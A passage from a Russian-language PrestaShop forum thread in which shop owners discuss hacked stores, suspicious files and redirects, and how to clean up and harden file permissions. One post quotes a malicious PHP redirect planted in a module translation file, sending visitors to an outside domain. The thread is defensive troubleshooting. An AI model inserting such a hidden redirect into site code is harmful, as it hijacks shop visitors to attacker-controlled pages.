Автор Тема: Взлом prestashop  (Прочитано 53337 раз)

12 Сентябрь 2016, 20:33:14
Ответ #45
  • Ветеран
  • *****
  • Сообщений: 3419
  • Репутация: +79/-6
  • Сообщество PrestaShop
    • Просмотр профиля
Появляются какие-то непонятные файлы. Название набор букв и цифр, вот такие - "a4545665fcs6564ab4f5c7888". На одном форуме мне сказали, что это обновление так ставится.
Повесилили  :)
Не на женском форуме спрашивали? Если что-то хотите узнать, спрашивать нужно на профильных форумах. А лучше нанаять профессионала.
Вирус это 100%. Удалять нужно.
13 Сентябрь 2016, 08:11:37
Ответ #46
  • Ветеран
  • *****
  • Сообщений: 33325
  • Репутация: +26771/-0
    • Просмотр профиля
Цитировать
Так кому верить? Обновление или вирус?
Верить своим глазам и здравому смыслу. Скачайте prestashop на оф. сайте, расспакуйте и загляните внутрь.Уверен, что таких файлов вы не найдете.
Если сами не можете, скиньте в личку данные по сайту, я посмотрю.
13 Сентябрь 2016, 09:25:45
Ответ #47
  • Фрилансер
  • *
  • Сообщений: 121
  • Репутация: +1/-0
  • Сообщество PrestaShop
    • Просмотр профиля
Спасибо!!!
Я сама хочу разобраться, но знаний не хватает. Советчиков много, это правда. Может быть проблемы и от этого. Но я везде спрашиваю, так и решение быстрее находится.

coder, выслала вам сообщение, посмотрите пожалуйста, я действительно не очень понимаю кто прав, где искать, что исправлять.
05 Октябрь 2016, 16:31:24
Ответ #48
  • Новичок
  • *
  • Сообщений: 20
  • Репутация: +0/-0
  • Сообщество PrestaShop
    • Просмотр профиля
    • HDTV Zone
Друзья, сегодня обнаружил, что при попытке попасть на сайт или админку меня "бросало" на boutiquewish.com
Зашел через консоль хостера, и скачал архив магазина.
Поиском обнаружил, что в
/modules/productpageadverts/translations/ru.php
код РНР
<?php     
  header
('Location: http://www.boutiquewish.com/modules/blocklanguages/translations/fixed/');     
?>
Удалил этот файл, через админку отключил этот модуль и просмотрев логи обнаружил, что  IP (Малайзия) :-)
Нужно будет разобраться с модулями, которые не нужны в магазине

ЗЫ. Прошу админов мою отдельную тему снести - разместил здесь свое сообщение, а может кому пригодится
10 Октябрь 2016, 10:57:15
Ответ #49
  • Старожил
  • ****
  • Сообщений: 414
  • Репутация: +0/-0
  • Сообщество PrestaShop
    • Просмотр профиля
Модули, которые нужно проверять, если не используте, удалить:
1. advancedslider
2. columnadverts
3. homepageadvertise
4. homepageadvertise2
5. productpageadverts
6. simpleslideshow
7. videostab

Такая же проблема с темой Warehouse. Разработчик темы выпустил обновление для устранения этой проблемы.
Добрый день,
У меня стоит эта тема и как я понимаю уже с обновлением. Появилась проблема, что при открытии сайта и промотки вниз, перекидывает на другой сайт.
Что посоветуете сделать?
Спасибо.
10 Октябрь 2016, 11:23:30
Ответ #50
  • Модератор
  • Ветеран
  • *****
  • Сообщений: 86688
  • Репутация: +25428/-0
  • Сообщество PrestaShop
    • Просмотр профиля
Вам нужно проверить все файлы сайта.
10 Октябрь 2016, 15:35:36
Ответ #51
  • Старожил
  • ****
  • Сообщений: 414
  • Репутация: +0/-0
  • Сообщество PrestaShop
    • Просмотр профиля
Вам нужно проверить все файлы сайта.

Как это можно сделать, использовать антивирусную программу? Если да, то какую посоветуете?

Спасибо.
10 Октябрь 2016, 15:55:12
Ответ #52
  • Ветеран
  • *****
  • Сообщений: 3419
  • Репутация: +79/-6
  • Сообщество PrestaShop
    • Просмотр профиля
Антивирус там ничего не найдет. Сравнивать нужно файлы с оригиналом, искать разницу в коде.
10 Октябрь 2016, 16:33:29
Ответ #53
  • Старожил
  • ****
  • Сообщений: 414
  • Репутация: +0/-0
  • Сообщество PrestaShop
    • Просмотр профиля
Антивирус там ничего не найдет. Сравнивать нужно файлы с оригиналом, искать разницу в коде.

Так в таком случае легче может сайт переустановить?

Есть ли возможность как то проверить шаблон на вирусы, перед установкой?
10 Октябрь 2016, 19:21:49
Ответ #54
  • Ветеран
  • *****
  • Сообщений: 3419
  • Репутация: +79/-6
  • Сообщество PrestaShop
    • Просмотр профиля
Переустановить конечно легче. На вирусы бесполезно проверять, так как вирусов нет, а есть чужой код. Антивирус этот код не определит.
13 Октябрь 2016, 06:55:45
Ответ #55
  • Старожил
  • ****
  • Сообщений: 414
  • Репутация: +0/-0
  • Сообщество PrestaShop
    • Просмотр профиля
Переустановить конечно легче. На вирусы бесполезно проверять, так как вирусов нет, а есть чужой код. Антивирус этот код не определит.

Спасибо Миколас и всем остальным за помощь.
13 Октябрь 2016, 06:57:55
Ответ #56
  • Старожил
  • ****
  • Сообщений: 414
  • Репутация: +0/-0
  • Сообщество PrestaShop
    • Просмотр профиля
а как насчет:
1. поставить пермишины на все файлы 444, а на папки 555 и сменить владельца, что бы апач не смог их изменять. (кроме кешей конечно)
2. позакрывать все левые (которые не нужны апачу для веб доступа) папки в htaccess, в т.ч. и кеши
файл не зальеш, бо прав нет
а если и залил, то хрен вызовешь, потому что доступа к этой папке скорее всего не будет
Не пролучится, для нормальной работы prestashop  нужно открыть
Recursive write permission on ~/config/
Recursive write permission on ~/cache/
Recursive write permission on ~/log/
Recursive write permission on ~/img/
Recursive write permission on ~/mails/
Recursive write permission on ~/modules/
Recursive write permission on ~/override/
Recursive write permission on ~/themes/default/lang/
Recursive write permission on ~/themes/default/pdf/lang/
Recursive write permission on ~/themes/default/cache/
Recursive write permission on ~/translations/
Recursive write permission on ~/upload/
Recursive write permission on ~/download/
Recursive write permission on ~/sitemap.xml




~/config/ - после установки не нужны пермишины
~/cache/ - нужны права на запись, но не нужен веб доступ (возможно могу ошибаться и там лежат кеши js или css, тогда можно запретить веб доступ к файлам .php)
~/log/ - веб доступ не нужен
~/img/ - запретить веб доступ для .php
~/mails/ - запертить веб доступ
~/modules/ - запретить запись, а если уж понадобиться установить модуль какой-то, то открыть.
~/override/ - запретить веб доступ да и запись тоже можно, не так часто что-то оверрайдиться (на многих магазинах - никогда)
~/themes/default/lang/ - запретить веб доступ
~/themes/default/pdf/lang/ - запретить веб доступ
~/themes/default/cache/ - запретить веб доступ (возможно могу ошибаться и там лежат кеши js или css, тогда можно запретить веб доступ к файлам .php)
~/translations/ - запретить веб доступ и запись (если будете что-то переводить, датите запись)
~/upload/ - запретить веб доступ
~/download/ - запретить веб доступ
~/sitemap.xml - не подвержен атаке

не так часто мы ставим модули и переводим уже рабочий магазин, что бы переживать о папках modules, override, lang и т.д.

это обычная практика защиты любого сайта и преста тут не исключение.

А как можно запретить доступ?

Спасибо
13 Октябрь 2016, 07:09:47
Ответ #57
  • Старожил
  • ****
  • Сообщений: 414
  • Репутация: +0/-0
  • Сообщество PrestaShop
    • Просмотр профиля
Модули, которые нужно проверять, если не используте, удалить:
1. advancedslider
2. columnadverts
3. homepageadvertise
4. homepageadvertise2
5. productpageadverts
6. simpleslideshow
7. videostab

Такая же проблема с темой Warehouse. Разработчик темы выпустил обновление для устранения этой проблемы.

Не подскажите какой номер обновления?

Спасибо.
13 Октябрь 2016, 11:26:14
Ответ #58
  • Ветеран
  • *****
  • Сообщений: 16670
  • Репутация: +14630/-5
  • Сообщество PrestaShop
    • Просмотр профиля
Смотрите последнии версии модулей на prestashop.com. В описании каждого модуля указывается версия и список изменений.
13 Октябрь 2016, 12:00:17
Ответ #59
  • Старожил
  • ****
  • Сообщений: 414
  • Репутация: +0/-0
  • Сообщество PrestaShop
    • Просмотр профиля
Смотрите последнии версии модулей на prestashop.com. В описании каждого модуля указывается версия и список изменений.

а что касается темы Warehouse с какой версии они устранили ошибки, может знаете?